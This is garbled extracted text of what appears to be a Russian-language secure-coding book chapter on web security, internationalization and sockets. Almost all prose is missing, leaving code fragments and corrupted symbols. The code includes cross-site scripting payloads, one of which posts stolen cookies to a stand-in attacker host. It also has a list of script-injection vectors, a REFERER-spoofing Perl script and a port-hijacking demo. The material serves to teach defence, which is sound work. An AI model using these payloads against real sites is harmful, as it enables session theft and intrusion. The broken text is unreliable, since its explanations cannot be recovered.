if (user.IsInRole(WindowsBuiltInRole.Administrator)) {
// ,
// .
}
, finally. try/catch
, ,
,
.

.
, .NET Framework
.
. ,
SQLClientPermissionAttribute, SQL Server .NET Data Provider
,

354
II
AllowBlankPassword false, .
SQL Server
.
, RegistryPermissionAttribute, (
) (, ..). ,
Read @"HKEY_LOCAL_MACHINE\SOFTWARE\Shipping",
,
. ,
.
,
, .
,
.
, ,
, , ,
SQL. ,
.
, !
,
. , , .
.
,
.
, .

, .
13

Web-
, ,
Web. , ,
Web . , 10
11, Web ,
12.
Web
. , Web,
, , . ,
, ,
. , : ,

, .
( ,
) HTTP, ,
SSL (Secure Sockets Layer) TLS (Transport
Layer Security). , !
- :

, (crosssite scripting, XSS)
. ,
:
Web. ,
356
II
Web
. ?
:
Web , ;
Web ,
.
, :
Hello,
<%
Response.Write(Request.Querystring("name"))
%>
, name QueryString,
www.contoso.com/req.asp?name=Blake.
, , ,
, Web,
? , , , ,
, :
<a href=www.contoso.com/req.asp?name=scriptcode>
$1 000 000</a>
scriptcode :
<script>x=document.cookie;alert(x);</script>
, , ,
. , :
<a href="http://www.microsoft.com@%77%77%77%2E%65%78%70%6C%6F%72%61%74%69
%6F%6E%61%69%72%2E%63%6F%6D%2F%72%65%71%2E%61%73%70%3F%6E%61%6D%65%3D%3C
%73%63%72%69%70%74%3E%78%3D%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B
%61%6C%65%72%74%28%78%29%3B%3C%2F%73%63%72%69%70%74%3E">
$1 000 000</a>
, www.microsoft.com, !
, URL: http://
< >:<>@<Web>. RFC 1738, Uniform
Resource Locators (URL) (ftp://ftp.isi.edu/innotes/rfc1738.txt).
3.1. Common Internet Scheme Syntax ( ):
URL
, URL,
IP
, : //<>:<
>@<>:<>/<url>.
: URL .
URL: www.microsoft.com . ,
, Web,
, ,
!
13 Web-
357
, ( XSS). name
, , HTML JavaScript,
, cookie, docu
ment.cookie. , cookie . ,
cookie, contoso.com, Web
, Web microsoft.com.
: ,
? , ,
, contoso.com,
cookie contoso.com. ,
, ,
, .
cookie
. ,
, .
. 2001 . Web
passport.com ,
. Hotmail
, passport.com,
Hotmail hotmail.passport.com. ,
cookie, Passport
. cookie
HTTP,
.
cookie.
(poisoning). (plugin)
(native) , (,
ActiveX SiteLock, 16),
,
. ,
.
(spoofing) . ,
XSS. ,

. ,
(. 131).
XSS
.
3.
Web
. , ,
. , Dynamic
HTML (DHTML) ,
.
.
358
II
<a href=http://www.contoso.com/req.asp?name=
<FORM action=http://www.badsite!sample!13.com/data.asp
method=post id="idForm">
<INPUT name="cookie" type="hidden">
</FORM>
<SCRIPT>
idForm.cookie.value=document.cookie;
idForm.submit();
</SCRIPT> >
!
</a>
, HTML
. , .
cookie Web.
!
SSL/TLS .
XSS.
,
(
). ,
,
,
. , , Web,
Web. (
querystring.)
, ,
.
Web-

Web-

Web-
. 131.
XSS

Web-

,
(/ )

13 Web-
359
cookie XSS , ,
cookie, . ,
cookie , ,
, . ,
cookie.
XSS CrossSite Scripting
Overview ( ) (http://
www.microsoft.com/technet/itsolutions/security/topics/csoverv.asp).
Open Web Appli
cation Security Project (http://www.owasp.org).
<SCRIPT>
.
<script>,
Web.
.
, <img src> <a href>
, URL. , ,
:
<a href="javascript:alert(1);"> $1 000 000!</a>

<script> !

, : ,
, . ,

.
,
HTML. ,
:
<a href=<%= request.querystring("url")%>> </a>

? , URL
:
http://www.microsoft.com onmouseover="malicious!script"
onmouseover HTML.
,
. ,
onload onactivate.
. ?
360
II
, XSS

XSS: , HTML
, , Windows (CHM
), HTML. .
XSS-
XSS Web, ,
.
XSS HTML .
,
, ,
.
. ,
CLYBG5EV, KDEJ41EB, ONWN
WXYR, W5U7GT63 ( CryptGenRandom).
. HTML
, ,
, .
, HTML
URL .
: localxss.html c:\webfiles:
<html>
<head>
<title> XSS!</title>
</head>
<body>
!
<script>document.write(location.hash)</script>
</body>
</html>
Web ,
(#) URL.
!:
file://C:\webfiles\localxss.html#<script>alert('!');</script>
, .
My Computer ( ). (Microsoft Internet Explorer
, .)
, , Internet (
), ,
My Computer.
Internet Explorer, .
location.search location.href.
13 Web-
361
, ,
Internet Explorer ,
. Internet Explorer 6 SP1,
Microsoft Windows XP SP1 Microsoft Windows .NET Server 2003
,
Internet My Computer.
. 131: Web
Web , !

Internet Explorer 4
.
, .
Web.
, Web

, . ,
.
, ,
Web.
,
.
,
,
. Internet Explorer : (
): My Computer ( ), Trusted Sites ( ), Local
Intranet ( ), Internet () Restricted Sites (
).
HTML Help Windows

Windows HTML Help
XSS. HTML Help HTML,
CHM. CHM
Microsoft HTML Help Workshop.
http: mk:. , CHM
XSS. HTML ,
HTML.
HTML-
HTML , , .
Internet Explorer res:,
( , HTML) DLL
, EXE . , res://mydll.dll/#23/
ERROR HTML ( #23) ERROR
362
II
mydll.dll. ERROR URL ,

XSS. , HTML
HTML.
2002 . Microsoft ,
XSS, (. 28 March
2002 Cumulative Patch for Internet Explorer http://www.micro
soft.com/technet/security/bulletin/MS02015.asp).
, Windows, Windows Explorer,
res:, DLL.
HTML, ,
XSS.
XSS-
, ,
XSS ,
. ( ?)
,
. ,
. XSS
SQL
,
.
(
):
;
;
innerText;
;
HttpOnly cookie Internet Explorer 6 SP1;
Internet Explorer;
<FRAME SECURITY> Internet Explorer;
ValidateRequest ASP.NET 1.1.
( )
, , ,
,
. .

. ,
Server. HTMLEncode ASP HttpServerUtility. HTML
Encode ASP.NET. ,
HTML, , <
<.
13 Web-
363

HTML, ,
. , www.contoso.com/product.asp?id=210502
ASP:
<a href=http://www.contoso.com/detail.asp?id=<%= request.querystring("id") %>>

HTML:
<a href=http://www.contoso.com/detail.asp?id=2105>
, id,
<a> <script>.
id : 2105><script event=onload>exploitcode
</script>.
<a>,
. , 2105 onclick="exploitcode" <a>,
onclick, , exploit.
,
, , :
<a href="http://www.contoso.com/
detail.asp?id=<%= Server.HTMLEncode (request.querystring("id")) %>">
,
href. id,
, detail.asp
id, , id. , 2105
onclick=exploitcode :
<a href="http://www.contoso.com/detail.asp?2105 onclick='exploitcode'">

, Contoso 2105 onclick=
exploitcode.
, ? , HTML
.
innerText
innerText ,
,
. :
<html>
<body>
<span id=spnTest></span>
</body>
</html>
<script for=window event=onload>
spnTest.innerText = location.hash;
</script>
364
II
HTML URL, ,
, .
file://C:\webfiles/xss.html#<script>alert(1);</script>
innerHTML
. !

Web
, .
, , <meta>,
Web
:
<meta http!equiv="Content!Type" content="text/html; charset=iso!8859!1">

, : ,
, , , , , ,
, , , , , , ,
, .
ISO8859:
88592 ;
88593 ;
88594 ( 88591);
88595 ;
88596 ;
88597 ;
88598 .
HttpOnly cookie-
Internet Explorer 6 SP1
Windows Security Push ,
Internet Explorer, XSS, cookie
, cookie
HttpOnly. , cookie DHTML
Internet Explorer 6 SP1:
Set!Cookie: name=Michael; domain=Microsoft.com; HttpOnly

, ,
, document.cookie.
ISAPI, ,
cookie Web
IIS (Internet Information Services).
13 Web-
365
// ISAPI! "HttpOnly"
DWORD WINAPI HttpFilterProc(
PHTTP_FILTER_CONTEXT pfc,
DWORD dwNotificationType,
LPVOID pvNotification) {
// cookie! ! 2k
CHAR szCookie[2048];
DWORD cbCookieOriginal = sizeof(szCookie) / sizeof(szCookie[0]);
DWORD cbCookie = cbCookieOriginal;
HTTP_FILTER_SEND_RESPONSE *pResponse =
(HTTP_FILTER_SEND_RESPONSE*)pvNotification;
CHAR *szHeader = "Set!Cookie:";
CHAR *szHttpOnly = "; HttpOnly";
if (pResponse!>GetHeader(pfc,szHeader,szCookie,&cbCookie)) {
if (SUCCEEDED(StringCchCat(szCookie,
cbCookieOriginal,
szHttpOnly))) {
if (!pResponse!>SetHeader(pfc,
szHeader,
szCookie)) {
// cookie!!
pResponse!>SetHeader(pfc,szHeader,"");
}
} else {
pResponse!>SetHeader(pfc,szHeader,"");
}
}
return SF_STATUS_REQ_NEXT_NOTIFICATION;
}
ASP.NET:
HttpCookie cookie = new HttpCookie("Name", "Michael");

cookie.Path = "/; HttpOnly";
Response.Cookies.Add(cookie);
HttpOnly cookie .
,
Application_OnPreSendRequestHeaders global.asax.
ASP:
response.addheader("Set!Cookie","Name=Mike; path=/; HttpOnly; Expires=" + CStr(Now))

! HttpOnly
, cookie.
cookie .
cookie .
366
II

XSS HTML. Internet Explorer
HTML , My Computer.
, , Internet Explorer 4.0,
, , , ,
Web .
. 132 msdn.microsoft.com ,
My Computer, Internet,
.
. 132. MSDN,
Internet, My Computer
:
<!!! saved from url=(0026)http://msdn.microsoft.com/ !!>

, Internet Explorer saved from url
Internet.
, Internet ( ),
My Computer, Web. (0026)
URL.
Web
, Web. ,
,
. HTML
HTML .
13 Web-
367
<FRAME SECURITY> Internet Explorer

Internet Explorer 6 SECURITY
<FRAME>,
. SECURITY
frame iframe. , :
<IFRAME SECURITY="restricted" src="http://www.contoso.com"></IFRAME>

Restricted Sites,
. Web
! SECURITY,
.
,
. ,
Internet Explorer, .

<FRAME SECURITY> restricted.
ValidateRequest ASP.NET 1.1

ASP.NET 1.1,
, XSS,
ASP.NET , XSS. !
, ,
XSS .
. , .
,
HTML cookie (HttpRequest.Cookies),
(HttpRequest.QueryString) HTML (HttpRequest.Form).
, HttpRe
questValidationException.
:
<%@ ValidateRequest="False" %>

:
<!!!
:
machine.config web.config

<location>, <system.web>
!!>
<configuration>
<system.web>
<pages validateRequest="true"/>
</system.web>
</configuration>
, true, ,
.
368
II

, Web,
, HTML,
, Web <IMG>
<TABLE>. HTML , .
. ,
.
:
<img src=javascript:alert([])>
<link rel=stylesheet href="javascript:alert(([])">
<input type=image src=javascript:alert(([])>
<bgsound src=javascript:alert(([])>
<iframe src="javascript:alert(([])">
<frameset onload=vbscript:msgbox(([])></frameset>
<table background="javascript:alert(([])"></table>
<object type=text/html data="javascript:alert(([]);"></object>
<body onload="javascript:alert(([])"></body>
<body background="javascript:alert(([])"></body>
<p style=left:expression(alert(([]))>
, http://online.securityfocus.com/archive/1/
272037:
<a href="javascript#[]">
<div onmouseover="[]">
<img src="javascript:[]">
<img dynsrc="javascript:[]">
<input type="image" dynsrc="javascript:[]">
<bgsound src="javascript:[]">
&<script>[]</script>
&{[]};
<img src=&{[]};>
<link rel="stylesheet" href="javascript:[]">
<iframe src="vbscript:[]">
<img src="mocha:[]">
<img src="livescript:[]">
<a href="about:<script>[]</script>">
<meta httpequiv="refresh" content="0;url=javascript:[]">
<body onload="[]">
<div style="backgroundimage: url(javascript:[]);">
<div style="behaviour: url([ ]);">
<div style="binding: url([ ]);">
<div style="width: expression([]);">
13 Web-
369
<style type="text/javascript">[]</style>
<object classid="clsid:..." codebase="javascript:[]">
<style><!</style><script>[]//></script>
<![CDATA[<!]]><script>[]//></script>
<! ><script>[]</script><! >
<<script>[]</script>
<img src="blah"onmouseover="[]">
<img src="blah>" onmouseover="[]">
<xml src="javascript:[]">
<xml id="X"><a><b><script>[]</script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div>
[\xC0][\xBC]script>[] [\xC0][\xBC]/script>
.
Internet Explorer, Netscape Navigator, Mozilla Opera,
. ,
.
HTML.
, ,
, JScript,
JScript
. VBScript,
?
HTML .
, jscript:, vbscript: javascript:?
Netscape Navigator livescript: mocha:
, &{}!
, , ,
HTML,
.
, .
,
HTML Web-
HTML,
. HTML
,
. <EM>,
<PRE>, <BR>, <P>, <I></I> <B></B> ,
.
, :
if (/^(?:[\s\w\?\!\,\.\'\"]*|(?:\<\/?(?:i|b|p|br|em|pre)\>))*$/i) {
# , !
}
370
II
(\s),
AZ, az, 09 (\w),
(<)
(/), i, b, p, pr, em pre
(>). i
. ,
HTML. , Hello, </i>World!<i>
, HTML,
.
! , HTML .
,
.
,
(http://www.distributed.net), 2002 .
. ,
, , , http://n0cgi.distribu
ted.net/faq/cache/268.html. , , URL
n<>cgi.
XSS-
,
XSS.
1. Web. ,
, querystring, HTTP, cookie
.
2. .
3. , .
4. , ?
, , ,

, (
), ,
. ,
, .

.
, , innerHTML docu
ment.write.
Web
HTML Form Protocol Attack (
HTML),
. , ,
http://www.remote.org/jochen/sec/hfpa/hfpa.pdf.
13 Web-
371
Web
, Web
. ,
Microsoft,
.
- eval()
, JavaScript
eval ( ),
. eval ,
JavaScript,
. ,
eval("a=42; b=69; document.write(a+b);");

111. , ,
eval !
HTTP
HTTP HTTP,
. ,

. Web
REFERER, cookie
, .
REFERER
REFERER HTTP, Web
URL Web, . Web

(spoofing), REFERER .
, ASP:
<%
strRef = Request.ServerVariables("HTTP_REFERER")
If strRef = "http://www.northwindtraders.com/login.html" Then
' , Login.html!
' ! .
End If
%>
Perl , REFERER HTTP
, Login.html:
use HTTP::Request::Common qw(POST GET);

use LWP::UserAgent;
$ua = LWP::UserAgent!>new();
$req = POST 'http://www.northwindtraders.com/dologin.asp',
372
II
Username => 'mike',

Password => 'mypa$w0rd',
];
$req!>header(Referer => 'http://www.northwindtraders.com/login.html');
$res = $ua!>request($req);
, Login.html, !
,
REFERER, .
. :
, , ,
.
, Web
: REFERER , ,
!
ISAPI
ISAPI
:
.
,
, ISAPI. ,
IIS 5 Inetinfo.exe,
SYSTEM. : DLL,
SYSTEM, ,
.
, ,
ISAPI C C++.
IIS 6 ,
SYSTEM, , ,
.
ISAPI
IPP (Internet Printing Protocol). http://www.mic
rosoft.com/technet/security/bulletin/MS01023.asp.
, ,
lpECB>GetServerVariable, HTTP
IIS. , lpdwSizeofBuffer
, , ,
, , ,
Unicode ANSI.
IPP.
13 Web-
373
TCHAR g_wszHostName[MAX_LEN + 1];

BOOL GetHostName(EXTENSION_CONTROL_BLOCK *pECB) {
DWORD dwSize = sizeof(g_wszHostName);
char szHostName[MAX_LEN + 1];
// .
pECB!>GetServerVariable(pECB!>ConnID,
"SERVER_NAME",
szHostName,
&dwSize);
// ANSI Unicode.
MultiByteToWideChar(CP_ACP,
0,
(LPCSTR)szHostName,
!1,
g_wszHostName,
sizeof (g_wszHostName));
, ? , :
#define UNICODE, TCHAR . ?
UNICODE ANSI; , g_wszHostName
szHostName MAX_LEN + 1, .
TCHAR WCHAR, ,
g_wszHostName MAX_LEN + 1 UNICODE.
dwSize (MAX_LEN + 1) sizeof (WCHAR) ,
sizeof(WCHAR) Windows 2 . g_wszHostName
szHostName, .
dwSize GetServerVariable DWORD,
, g_wszHostName,
, szHostName, szHost
Name, , sizeof(szHostName). ,
, szHostName
GetHostName , , .
dwSize
WCHAR TCHAR.
WCHAR g_wszHostName[MAX_LEN + 1];

BOOL GetHostName(EXTENSION_CONTROL_BLOCK *pECB) {
char szHostName[MAX_LEN + 1];
DWORD dwSize = sizeof(szHostName);
// .
pECB!>GetServerVariable(pECB!>ConnID,
"SERVER_NAME",
szHostName,
&dwSize);
374
II
// ANSI Unicode.
MultiByteToWideChar(CP_ACP,
0,
(LPCSTR)szHostName,
!1,
g_wszHostName,
sizeof (g_wszHostName) / sizeof(g_wszHostName[0]));
IIS 6 : IPP ,
, ,
.
:
ISAPI;
ISAPI;
Unicode ANSI.
ISAPI;
;
, ,
.
.
cookie-
cookie , ,
, .
, ,
, .
, cookie
, .
cookie HTML ,
. 5% 50%,
Web !
cookie
, :
HTML,
Web.

Element N.V. Element InstantShop. http://
www.securityfocus.com/bid/1836.
: cookie,
, .
,
MAC cookie ,
.
, , Web.
, ,
. , ! MAC 6.
13 Web-
375
cookie-
.
Web .
cookie.
, HTTP ,
cookie. cookie
RFC 2965 HTTP State Management Mechanism (
HTTP) (http://www.ietf.org/rfc/rfc2965.txt).
Web
, ,
.
cookie,
,
. ,
cookie. , :
SSL. SSL , cookie
. 32 ,

. , SSL
cookie, Web. , 0005F1CC.
,
cookie 0005F1CE. 0005F1CF.
: cookie ,
,
. , cookie 0005F1CD.
, Cookie: 0005F1CD
,
. ! ,
,
,
.
: cookie
. cookie
. 8. SSL,
(, ).
SSL/TLS
,
, ,
SSL. SSL, ,
, TLS, , .
:
;
;
.
376
II
,
. :
.
, SSL/TLS;
,
.
,
SSL/TLS,
.
, ,
, Subject ()
X.509, , .
WinInet, WinHTTP System.Net .NET
Framework . ,
.
XSS Web ,
.
,
. Web
.
Web, HTML HTML
XSS.
14

, ,
, . ,
,
( ) .
, Unicode .
. ,
Windows Security Push,
, ,
.

I18N.
internationalization ( i, n, 18
), .

, . , ,
10 11. , , ,
, , I18N
. .
378
II
I18N
I18N, :
Unicode;
Unicode
.
,
. , ,
, !
I18N .
Unicode
(A, , )
( ),
(code point). ,
Microsoft Windows .
, Unicode , ,
. Unicode
, .
Microsoft Windows Microsoft Office Unicode,
, , ,
Unicode. CLR .NET Framework
Unicode.
Unicode:
UTF8, UTF16 UTF32.
, UTF16,
Windows .NET.
, . UTF8
, Windows, .
Windows (National Langu
age Support, NLS) API
UTF8 UTF16, : MultiByteToWideChar
WideCharToMultiByte. UTF32 ,
.

- I18N
,
.
.
// ,
// .
14
379
// \0.
int nLen = MultiByteToWideChar(CP_OEMCP,
MB_ERR_INVALID_CHARS,
lpszOld, !1, NULL, 0);
// , !
if (nLen == 0) {
// , !
}
// .
LPWSTR lpszNew = (LPWSTR) GlobalAlloc(0, sizeof(WCHAR) * nLen);
// ,
// !
if (lpszNew == NULL) {
// , !
}
// .
nLen = MultiByteToWideChar(CP_OEMCP,
MB_ERR_INVALID_CHARS,
lpszOld, !1, lpszNew, nLen);
// ,
// .
if (nLen == 0) {
// , !
}

. , GB18030,
4 ,
.
LCMapString :
, , LCMAP_SORTKEY.
, Unicode
, Creating Arbitrary Shellcode in Unicode
Expanded Strings (http://www.nextgenss.com/papers/unicodebo.pdf)
Unicode.

, Win32
. ( CreateProcessA),
, Unicode
, Win32 W ( CreateProcessW)
16 ,
.
.
380
II
A W
Windows. winbase.h
.
#ifdef UNICODE
#define CreateProcess CreateProcessW
#else
#define CreateProcess CreateProcessA
#endif // !UNICODE
Unicode
Unicode (surrogate pair)
,
Unicode. , ,
16 U+D800 U+DBFF.
, , U+DC00 U+DFFF.
Unicode (combining character)
.
, .
http://www.unicode.org.
, :
, , 16
UTF16
. 16 Unicode
, .
Unicode .
I18N
, Unicode
. , ,
, ,
, URL.
,
.
Microsoft, Windows .NET Server 2003 IsNLSDefinedString,
, Unicode.
IsNLSDefinedString True, :
, CompareString (,
).
.

Unicode
. , 3.log Unicode (3. log),
ASCII. ,
14
381
.
, .
(
).

LCMapString
LCMapString (
), .
LCMapString
. , LCMapString
, .
, LCMapString .
, IsNLSDefinedString,
.

CreateFile
CompareString (
) : .
, , CompareString ,
NTFS , .
. ,
, ,
CreateFile .

.
. ,
ISO 88598E ( )
UTF16,
950 (Big5, )
UTF16.
, .
, ,
, .
UTF8 Windows XP
MultiByteToWideChar WideCharToMultiByte.
UTF8 UTF16 ,
.
, .
Windows
.
Microsoft MultiByteToWideChar
382
II
WideCharToMultiByte
. ,
, .
MultiByteToWideChar
MB_PRECOMPOSED MB_ERR_INVALID_CHARS
MultiByteToWideChar MB_PRECOMPOSED.
( )
. .
50000, MB_ERR_INVALID_CHARS
.
50000 MultiByteToWideChar ,
, .
MB_ERR_INVALID_CHARS
.
MSDN.
Windows XP, MB_ERR_INVALID_CHARS
UTF8 ( 65001, CP_UTF8).
WideCharToMultiByte
WC_NO_BEST_FIT_CHARS
, (,
, ), WC_NO_BEST_
FIT_CHARS. ,
.
. , (
) 8 ()!
WC_NO_BEST_FIT_CHARS Microsoft Windows 2000/XP
Microsoft Windows .NET Server 2003.
,
, WideCharToMultibyte, UTF
16, MultiByteToWideChar
.
( ), ,
.
.
/*
RoundTrip.cpp : .
*/
#include "stdafx.h"
14
/*
CheckRoundTrip
TRUE
Unicode .
FALSE.
*/
BOOL CheckRoundTrip(
DWORD uiCodePage,
LPWSTR wszString)
{
BOOL fStatus = TRUE;
BYTE *pbTemp = NULL;
WCHAR *pwcTemp = NULL;
try {
// , MAX_STRING_LEN
//
const size_t MAX_STRING_LEN = 200;
size_t cchCount = 0;
if (!SUCCEEDED(StringCchLength(wszString,
MAX_STRING_LEN, &cchCount)))
throw FALSE;
pbTemp = new BYTE[MAX_STRING_LEN];
pwcTemp = new WCHAR[MAX_STRING_LEN];
if (!pbTemp || !pwcTemp) {
printf(": !\n");
throw FALSE;
}
ZeroMemory(pbTemp,MAX_STRING_LEN * sizeof(BYTE));
ZeroMemory(pwcTemp,MAX_STRING_LEN * sizeof(WCHAR));
// Unicode .
int rc = WideCharToMultiByte( uiCodePage,
0,
wszString,
!1,
(LPSTR)pbTemp,
MAX_STRING_LEN,
NULL,
NULL );
if (!rc) {
printf(": WC2MB = %d, CodePage = %d,
String = %ws\n",
GetLastError(), uiCodePage, wszString);
throw FALSE;
}
383
384
II
// Unicode.
rc = MultiByteToWideChar(uiCodePage,
0,
(LPSTR)pbTemp,
!1,
pwcTemp,
MAX_STRING_LEN / sizeof(WCHAR) );
if (!rc) {
printf(": MB2WC = %d,
CodePage = %d, String = %ws\n",
GetLastError(), uiCodePage, wszString);
throw FALSE;
}
// Unicode!,
// .
size_t Length = 0;
StringCchLength(wszString, MAX_STRING_LEN,&Length);
if (Length+1 != rc) {
printf(" %d != rc %d\n", Length, rc);
throw FALSE;
}
// Unicode!
// .
for (size_t ctr = 0; ctr < Length; ctr++) {
if (pwcTemp[ctr] != wszString[ctr])
throw FALSE;
}
} catch (BOOL iErr) {
fStatus = iErr;
}
if (pbTemp) delete [] pbTemp;
if (pwcTemp) delete [] pwcTemp;
return (fStatus);
}
int _cdecl main(
int argc,
char* argv[])
{
LPWSTR s1 = L"\x00a9MicrosoftCorp";
LPWSTR s2 = L"To\x221e&Beyond";
printf("1252
printf("437
printf("1252
printf("437
// Copyright
// Infinity
" " = %d\n", CheckRoundTrip(1252, s1));

" " = %d\n", CheckRoundTrip(437, s1));
"" = %d\n", CheckRoundTrip(1252, s2));
"" = %d\n", CheckRoundTrip(437, s2));
14
385
return (1);
}
,
. ,
1252 ( Windows Latin I,
) 437 ( MS
DOS): 1252, 437,
437, 1252.

, ,
,
. , .
, [
(. http://www.unicode.org/
unicode/reports/tr21)], Invariant, (LOCALE_INVARIANT) Win
dows XP invariant culture .
int nResult = CompareString(

LOCALE_INVARIANT,
NORM_IGNORECASE | NORM_IGNOREKANATYPE | NORM_IGNOREWIDTH,
lpStr1, !1, lpStr2, !1 );
, Windows XP,
US English. Windows XP
CompareString , LOCALE_INVARIANT, Microsoft
, .
int nResult = CompareString(

MAKELCID(MAKELANGID(LANG_ENGLISH, SUBLANG_DEFAULT), SORT_DEFAULT),
NORM_IGNORECASE | NORM_IGNOREKANATYPE | NORM_IGNOREWIDTH,
lpStr1, !1, lpStr2, !1 );
,
. ,
,
. , Windows:
A Z
;
I i;
A a;
.
Windows
( ).
, ,
. ,
(Invariant) .
386
II
Unicode
Unicode ,
( )
. , ,
U+0030 (0) U+0039 (9).
Unicode 3.1 .
.
Unicode.
.NET Framework GetUnico
deCategory. , NLS
. Unicode
http://www.unicode.org/unicode/reports/tr23.
GetStringTypeEx,
. , GetStringTypeEx,
Unicode, .
Windows ,
GetStringTypeEx.
. 141 GetStringTypeEx Unicode
, U+0080. U+0080
Unicode.
14-1.
Unicode
GetStringTypeEx
Unicode
C1_ALPHA
C1_UPPER
C1_LOWER
C1_DIGIT
C1_SPACE
C1_PUNCT
C1_CNTRL
ISO, , ,

C1_XDIGIT
C3_NONSPACING
C3_SYMBOL
C3_KATAKANA
C3_HIRAGANA
C3_HALFWIDTH
C3_IDEOGRAPH
, Unicode,
. ,
. . .
14
387
A. ,
.
, , .
, .
.
Unicode Consortium
. Form C.
.
. , ,
Form C. ( http://
www.unicode.org/unicode/reports/tr15/.)
URL IETF (Internet
Engineering Task Force) W3C. http:/
/www.idn.net/draft/draftduersti18nnorm04.txt http://www.w3.org/TR/
charmod.
NTFS, FAT32, NFS, High Sierra MacOS
.
.

RFC.
Win32 FoldString
. , Unicode,

Unicode. FoldString,
Unicode. , FoldString MAP_FOLDDIGITS
, Unicode.
I18N , ,
.
,
. ,
,
.
, , I18N .
I18N
, ,
12
Unicode. ,
, .
I18N,
Microsoft (http://www.microsoft.com/globaldev) Unicode (http://
www.unicode.org). (http://
www.unicode.org/unicode/consortium/distlist.html). , ,
news://comp.std.internat.
I I I
15

(sockets) ,
TCP/IP. IP
TCP UDP ,
. ,
IPv6 (Internet Protocol version 6)
.
, ;
,
; .
,
,
.
, .
, (Bob Quinn)
(David Shute) Windows Sockets Network Programming (AddisonWesley
Publishing Co., 1995). C
++. .cpp,
,
C.
Microsoft,
.
, Windows
, (
SSL/TLS) API SSPI (Secu
rity Support Provider Interface). API
, :
. 4, SSPI
15
391
(Jeffrey Richter) (Jason Clark) Prog

ramming ServerSide Applications for Microsoft Windows 2000 (Microsoft Press, 2000)
( ., . . Microsoft
Windows 2000. .:; .: , 2001).

(server hijacking)
, .
?
.
TCP UDP . ,
, , .
(unsigned short) ( 16)
C C++. 065535.
bind :
int bind (
SOCKET s,
const struct sockaddr FAR* name,
int namelen
);
.
IPv4* (Internet Protocol version 4)
sockaddr_in:
struct sockaddr_in{
short
sin_family;
unsigned short
sin_port;
struct
in_addr sin_addr;
char
sin_zero[8];
};

IPv6 .
, Microsoft
Service Pack 1 Microsoft Windows XP.
IPv6 IPv4. IPv4, ,
,
.
IP
sin_port sin_addr.
, sin_addr
. bind , ,
,
IP. . .
392
III
INADDR_ANY ( 0),
. IP,
, .
( ) : .

. INADDR_ANY
IP. IP:
157.34.32.56 172.101.92.44.
172.101.92.44,
INADDR_ANY.
IP, .
, ,
. , ,
.
SO_EXCLUSIVEADDRUSE, Microsoft Windows NT 4 SP 4.
, Microsoft ,
(Chris Wysopal) ( Weld Pond).
Netcat ( Hobbit) Windows
:
Windows NT .
, Hobbit
L0pht ( @stake). (.
Secureco2\Chapter15\BindDemo)
.
/*
BindDemoSvr.cpp
*/
#include <winsock2.h>
#include <stdio.h>
#include <assert.h>
#include "SocketHelper.h"
// , winsock2.h
#ifndef SO_EXCLUSIVEADDRUSE
#define SO_EXCLUSIVEADDRUSE ((int)(~SO_REUSEADDR))
#endif
/*
UDP!.
8391. ,
.
*/
{
SOCKET sock;
sockaddr_in sin;
DWORD packets;
15
bool hijack = false;

bool nohijack = false;
if(argc < 2 || argc > 3)
{
printf(" %s [ ]\n", argv[0]);
printf(":\n\t!hijack\n\t!nohijack\n");
return !1;
}
if(argc == 3)
{
// , "!hijack"
// "!nohijack".
if(strcmp("!hijack", argv[2]) == 0)
{
hijack = true;
}
else
if(strcmp("!nohijack", argv[2]) == 0)
{
nohijack = true;
}
else
{
return !1;
}
}
if(!InitWinsock())
return !1;
// .
sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sock == INVALID_SOCKET)
{
printf(" ! err = %d\n", GetLastError());
return !1;
}
// .
// sockaddr_in.
// ,
// .
if(!InitSockAddr(&sin, argv[1], 8391))
{
printf(" sockaddr_in ! doh!\n");
closesocket(sock);
393
394
III
return !1;
}
// : .
if(hijack)
{
BOOL val = TRUE;
if(setsockopt(sock,
SOL_SOCKET,
SO_REUSEADDR,
(char*)&val,
sizeof(val)) == 0)
{
printf("SO_REUSEADDR ! !!\n");
}
else
{
printf(" SO_REUSEADDR ! err = %d\n",
GetLastError());
closesocket(sock);
return !1;
}
}
else
if(nohijack)
{
BOOL val = TRUE;
if(setsockopt(sock,
SOL_SOCKET,
SO_EXCLUSIVEADDRUSE,
(char*)&val,
sizeof(val)) == 0)
{
printf("SO_EXCLUSIVEADDRUSE \n");
printf(" !\n");
}
else
{
printf(" SO_ EXCLUSIVEADDRUSE ! err = %d\n",
GetLastError());
closesocket(sock);
return !1;
}
}
if(bind(sock, (sockaddr*)&sin, sizeof(sockaddr_in)) == 0)
{
}
15
else
{
if(hijack)
{
printf("! !\ n");
}
printf(" !
= %d\n", GetLastError());
closesocket(sock);
return !1;
}
// , . ,
// ! ! ,
// .
for(packets = 0; packets < 10; packets++)
{
char buf[512];
sockaddr_in from;
int fromlen = sizeof(sockaddr_in);
// : ;
// 0, ;
// 0,
//( );
// 0, .
if(recvfrom(sock, buf, 512, 0, (sockaddr*)&from, &fromlen)> 0)
{
printf(" %s %d:\n%s\n",
inet_ntoa(from.sin_addr),
ntohs(from.sin_port),
buf);
// ,
// .
if(hijack)
{
sockaddr_in local;
if(InitSockAddr(&local, "127.0.0.1", 83 91))
{
buf[sizeof(buf)!1] = '\0';
strncpy(buf, " !", siz eof(buf) !1);
if(sendto(sock,
buf,
strlen(buf) + 1, 0,
(sockaddr*)&local,
sizeof(sockaddr_in)) < 1)
{
395
396
III
printf
(" localhost ! err = %d\n",
GetLastError());
}
}
}
}
else
{
// , , ,
// .
printf(" %d\n", GetLastError() );
break;
}
}
return 0;
}
,
. SocketHelper.cpp ,
. ,
.
.
: hijack nohijack.
, .
. hijack SO_REUSEADDR,
, nohijack
SO_EXCLUSIVEADDRUSE, SO_REUSEADDR.
, .

.
,
.
, , SO_EX
CLUSIVEADDRUSE. , ,
:
BindDemo.exe 0.0.0.0
( 192.168.0.1 IP
):
BindDemo.exe 192.168.0.1 hijack

, :
BindDemoClient.exe 192.168.0.1
:
15
397
SO_REUSEADDR ! !!
192.168.0.1
192.168.0.1 4081:
!
:
0.0.0.0
192.168.0.1 8391:
!
(,
, , IP ,
ACL), ,
.
,
. , , ,
.
. (
) :
BindDemo.exe 0.0.0.0 nohijack

, :
BindDemo.exe 192.168.0.1 hijack

:
SO_EXCLUSIVEADDRUSE ! !
0.0.0.0
:
SO_REUSEADDR ! !!
! !
= 10013
, ,
:
192.168.0.1 4097:
!
SO_EXCLUSIVEADDRUSE
,
. ,
TCP/IP
. ,
shutdown , recv
,
. closesocket,
. shutdown SDK.
398
III

